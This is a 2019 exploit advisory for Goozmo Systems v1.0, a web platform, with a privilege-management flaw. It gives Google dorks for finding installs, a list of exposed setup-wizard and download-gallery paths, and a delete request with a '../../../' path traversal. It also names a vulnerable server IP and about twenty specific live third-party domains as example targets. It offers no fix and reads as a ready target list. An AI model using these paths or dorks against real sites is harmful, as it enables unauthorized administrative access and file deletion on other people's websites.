#################################################################### # Exploit Title : Goozmo™ Systems v.1.0 Improper Privilege Management # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 30/01/2019 # Vendor Homepage : goozmo.com # Software Information Link : goozmo.com/about-goozmo/ # Software Version : 1.0 # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:''Goozmo™ Systems - v.1.0'' intext:©2000-2018 Goozmo™ Inc, All rights reserved. www.goozmo.com | Printed on Recycled Data™ intext:© 2000 – 2019 Goozmo, Inc + Denver, Colorado Design, Strategy, Development, and Fun + Printed on Recycled Data™ # Vulnerability Type : CWE-269 [ Improper Privilege Management ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** Goozmo Systems is the agency of web designers, web developers and fanatics of web apps. #################################################################### # Impact : *********** * The following versions of Goozmo™ Systems, a software management platform, are affected : Goozmo™ Systems v.1.0 * This software Goozmo™ Systems v.1.0 does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor. * Successful exploitation of this vulnerability could allow authenticated system users to escalate their privileges under certain conditions. * Authenticated, non-administrative local users are able to alter service executables with escalated privileges which could allow an attacker to execute arbitrary code under the context of the current system services. Note : New installation of websites and one attacker has administrational authorization. Note : If you add a note to one website - all websites affects at the same time. #################################################################### # Privelege Escalation/Improper Privilege Management Exploit : ****************************************************** /goowizard/step_one.php /goowizard/step_two.php /goowizard/step_three.php /goowizard/step_four.php /goowizard/step_five.php /goopages/pages_downloadgallery/addfile.php /goopages/pages_downloadgallery/index.php /goopages/pages_downloadgallery/addfile.php?edit=1&id=[ID-NUMBER]&galleryid=1 /file_archive/file_archive.php?user_id=&site_id=&file_spot=imgthree /goopages/pages_downloadgallery/deletefile.php?id=[ID-NUMBER]&filename=[FILENAME]&image=../../../[FILENAME] #################################################################### # Example Vulnerable Sites : ************************* Note : Vulnerable IP Address => (104.196.11.136) There are 191 domains hosted on this server. [+] 10170orchidreserve.com/goopages/pages_downloadgallery/index.php => [ Proof of Concept ] => archive.is/DQUj9 [+] synergisticbuildingtechnologies.com/goowizard/step_one.php [+] springerscustomcycles.com/goowizard/step_two.php [+] artworkspottery.com/goowizard/step_three.php [+] architecturalpartnership.com/goowizard/step_four.php [+] anaturalbliss.com/goowizard/step_five.php [+] 7480marshcove.com/goopages/pages_downloadgallery/addfile.php [+] 6441riverpointeway.com/goopages/pages_downloadgallery/addfile.php [+] threeiguanasbelize.com/goopages/pages_downloadgallery/addfile.php [+] 2175ibisisleroad.com/goopages/pages_downloadgallery/addfile.php [+] 2128milanocourt.com/goopages/pages_downloadgallery/addfile.php [+] 13401oakmeade.com/goopages/pages_downloadgallery/addfile.php [+] 13361marshlanding.com/goopages/pages_downloadgallery/addfile.php [+] 13201marshlanding.com/goopages/pages_downloadgallery/addfile.php [+] 13181oakmeade.com/goopages/pages_downloadgallery/addfile.php [+] 13081sabalchase.com/goopages/pages_downloadgallery/addfile.php [+] 13061sabalchase.com/goopages/pages_downloadgallery/addfile.php [+] 13001brynwood.com/goopages/pages_downloadgallery/addfile.php [+] 12981brynwood.com/goopages/pages_downloadgallery/addfile.php [+] caninecampovers.com/goopages/pages_downloadgallery/addfile.php #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################